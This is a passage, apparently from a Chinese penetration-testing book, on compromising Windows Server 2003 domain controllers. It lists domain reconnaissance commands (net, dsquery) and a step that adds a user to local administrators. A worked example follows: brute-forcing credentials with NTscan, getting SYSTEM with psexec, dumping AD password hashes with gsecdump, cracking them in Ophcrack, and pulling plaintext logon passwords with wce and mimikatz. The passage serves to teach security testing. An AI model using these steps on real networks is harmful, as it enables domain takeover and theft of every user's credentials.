2.6 Windows Server 2003域控服務器密碼獲取

域控制器相當于一個門衛，它包含了由這個域的賬戶、密碼、管理策略等信息構成的數據庫。當一臺計算機登錄域時，域控制器首先要鑒別這臺計算機是否屬于這個域，以及用戶使用的登錄賬號和密碼是否正確。如果正確，則允許計算機登錄這個域，使用該域內其有權限訪問的任何資源，例如文件服務器、打印服務器（也就是說，域控制器僅起到一個驗證作用，訪問其他資源并不需要再跟域控制器扯上關系）；如果不正確，則不允許計算機登錄，這時計算機將無法訪問域內的任何資源，這在一定程度上保護了企業的網絡資源。域服務器的作用如下。

·安全集中管理，統一安全策略。

·軟件集中管理，按照公司要求限定所有機器只能運行必需的辦公軟件。

·環境集中管理，利用AD可以統一客戶端桌面、IE、TCP/IP等的設置。

·活動目錄是企業基礎架構的根本，是公司整體統一管理的基礎，ISA、Exchange、防病毒服務器、補丁分發服務器、文件服務器等服務依賴于域服務器。

域控服務器是網絡安全滲透的重點對象，獲取了域控服務器的權限，就意味著掌控了整個網絡的資源和權限。在滲透過程中，獲取域控服務器用戶賬號和密碼是最基礎和必需的一步。本節將就域控滲透思路、內網滲透常見命令及域控用戶賬號和密碼的獲取進行探討。

2.6.1 域控服務器滲透思路

有關域控滲透思路，仁者見仁，智者見智，筆者就實際工作經驗總結如下。

·尋找網絡入口，獲取域控用戶權限，通過用戶獲取域控管理員信息。針對域控管理員開展個人主機滲透或者社會工程學攻擊，獲取域管理員個人主機權限，進而獲取域控服務器權限。

·獲取域控服務器內某一臺Web服務器或者其他服務器的權限。在獲取網絡中某一臺服務器的權限后，通過獲取該服務器的用戶賬號和密碼，對整個內網通過NTscan等工具進行賬號的暴力破解，以獲取域控服務器權限。

總之，在內網滲透中需要對各種信息進行收集和研判，通過已有信息進行大膽的推斷和滲透測試，不斷擴大權限，最終獲取域控服務器權限。

2.6.2 內網域控服務器滲透常見命令

1．本機信息收集命令

·用戶列表（Windows用戶列表、郵件用戶等）：分析Windows用戶列表，一定不要忽略administrator；分析郵件用戶，內網/域郵件用戶通常就是內網/域用戶，例如owa。

·進程列表：分析殺毒軟件/安全監控工具、郵件客戶端、VPN等。

·服務列表：與安全防范工具有關的服務（判斷是否可以手動開關等），存在問題的服務（權限/漏洞）。

·端口列表：開放端口對應的常見服務/應用程序（匿名/權限/漏洞等），利用端口進行信息收集，建議深入挖掘（NETBIOS、SMB等）。

·補丁列表：分析Windows補丁、第三方軟件（Java/Oracle/Flash等）的漏洞。

·本機共享（域內共享在很多時候是相同的）：本機共享列表/訪問權限，本機訪問的域共享/訪問權限。

·本地用戶習慣分析：歷史記錄、收藏夾、文檔等，特別是遠程終端、PUTTY、FTP及SSH等。有些用戶喜歡在本地保存登錄密碼，通過客戶端可以直接登錄。

2．常見信息收集命令

·查詢本機用戶列表：net user。

·查詢本機管理員（通常含有域用戶）:net localhroup administrators。

·查詢域管理員用戶：net group "domain admins"/domain。

·查詢域用戶：net user/domain。

·查詢域里面的工作組：net group/domain。

·查詢域名稱：net view/domain。

·查詢域內計算機：net view/domain:XX。

·查詢域控制器：net time/domain。

·查詢域管理員用戶組：net localgroup administrators/domain。

·將域用戶添加到本機：net localgroup administrators workgroup\user001/add。

·查看域控制器（如果有多臺）:net group "Domain controllers"。

·查詢本機IP段、所在域等：ipconfig/all。

·查詢同一域內的機器列表：net view。

·查詢所有域控制器：dsquery server。例如，“dsquery server-domain super.com | dsget server-dnsname-site”用于搜索域內所有域控制器并顯示它們的DNS主機名和站點名稱。

·查詢域內計算機：dsquery computer。例如，“dsquery computer domainroot-name admin*-limit 10”用于搜索域內名稱以“admin”開頭的10臺機器。

·查詢域用戶：dsquery user。例如，“dsquery user domainroot-name admin*-limit 10”用于搜索域內以“admin”開頭的10個用戶。

·查詢域內聯系人：dsquery contact。例如，“dsquery contact domainroot-name admin*-limit 10”用于搜索域內以“admin”開頭的10個聯系人。

·查詢域內子網：dsquery subnet。

·查詢域內用戶組：dsquery group。例如，“dsquery group dc=super, dc=com |more”用于搜索在“dc=super, dc=com”域中的所有組。

·查詢域內組織單位：dsquery ou。

·查詢域內站點：dsquery site。例如，“dsquery site-o rdn”用于搜索域中所有站點的名稱。

·查詢域內所有計算機：net group "domain computers"/domain。-limit參數不指定查詢數量，則默認顯示前100條結果；“dsquery computer-inactive 4”用于查詢超過4周未登錄的計算機；“dsquery user-inactive 4”用于查詢超過4周未登錄的用戶；“dsquery computer "ou=xx, dc=xx, dc=com"”用于通過組織單位查詢計算機。

2.6.3 域控服務器用戶賬號和密碼獲取實例

（1）獲取IP地址配置信息

打開命令提示符窗口，如圖2-48所示，輸入“ipconfig/all”命令，查看該服務器IP地址等信息，通過該信息來探測是否存在域控服務器。如果存在內部域控，在DNS服務器中一定會有內部IP地址，例如10.168.10.1。

圖2-48 獲取網絡配置情況

（2）查看域控情況

通過“net view”命令查看顯示當前域的計算機列表，在本例中發現僅存在1臺服務器，如圖2-49所示。通過“net view”命令可以顯示域列表、計算機列表或指定計算機的共享資源列表。“net view [\\ComputerName] [/domain[:DomainName]]”命令用于指定要查看其可用計算機的域。如果省略“DomainName”，使用“/domain”，將顯示網絡上的所有域。在本例中輸入命令“net view/domain”，可知該網絡中存在兩個域，分別是ITEDT47和WORKGROUP，如圖2-50所示。

圖2-49 顯示當前域的計算機列表

圖2-50 獲取當前域控名稱

（3）登錄域控服務器

在本例中，通過NTscan工具，用已經獲取的Web服務器管理員密碼和用戶密碼對網段10.168.10.1-254進行掃描，獲取了IP地址為10.168.10.3的域控服務器的用戶名和密碼。通過遠程終端登錄該服務器，如圖2-51所示。

圖2-51 獲取域控服務器權限

（4）獲取域控服務器用戶密碼

將psexec、gsecdump等工具上傳到域控服務器。執行“psexec\\\127.0.0.1 cmd”命令獲取system權限，然后到工具目錄下執行“gsecdump-s>all.txt”命令，將用戶密碼Hash值全部導出到all.txt文件中，代碼如下，運行情況如圖2-52所示。gsecdump_v2.0b5的下載地址為http://www.truesec.com/Tools/Tool/gsecdump_v2.0b5。

圖2-52 獲取域控服務器用戶密碼

        usage: gsecdump [options]
        options:
          -a [ --dump_all ]        dump all secrets
          -s [ --dump_hashes ]     dump hashes from SAM/AD
          -l [ --dump_lsa ]        dump lsa secrets
          -u [ --dump_usedhashes ]  dump hashes from active logon sessions
          -w [ --dump_wireless ]   dump microsoft wireless connections
          -h [ --help ]           show help
          -S [ --system ]          run as localsystem

（5）查看并整理域控用戶密碼

通過“記事本”等程序打開all.txt，將IUSR、IWAM及末尾含有“$”符號的用戶全部刪除。例如，IUSR_FS02T47E(current)、IWAM_FS02T47E(current)、RM103-2$(current)等密碼都是無用密碼，如圖2-53所示。

圖2-53 查看和清理域控用戶密碼

（6）破解域控用戶密碼

將整理好的文件導入Ophcrack中進行破解，如圖2-54所示，可以快速獲得域控用戶的密碼。

圖2-54 破解域控密碼

技巧

在有些情況下，由于管理員設置了超過14位的密碼，所以通過gsecdump獲取的Hash值無法用Ophcrace進行破解，這時可以用wce進行破解。執行“wce-w”命令直接獲取登錄用戶的明文密碼，如圖2-55所示。

圖2-55 獲取登錄用戶的明文密碼

還可以通過mimikatz程序獲取系統登錄時曾經使用的明文密碼，命令如下。

        mimikatz
        privilege::debug
        sekurlsa::logonpasswords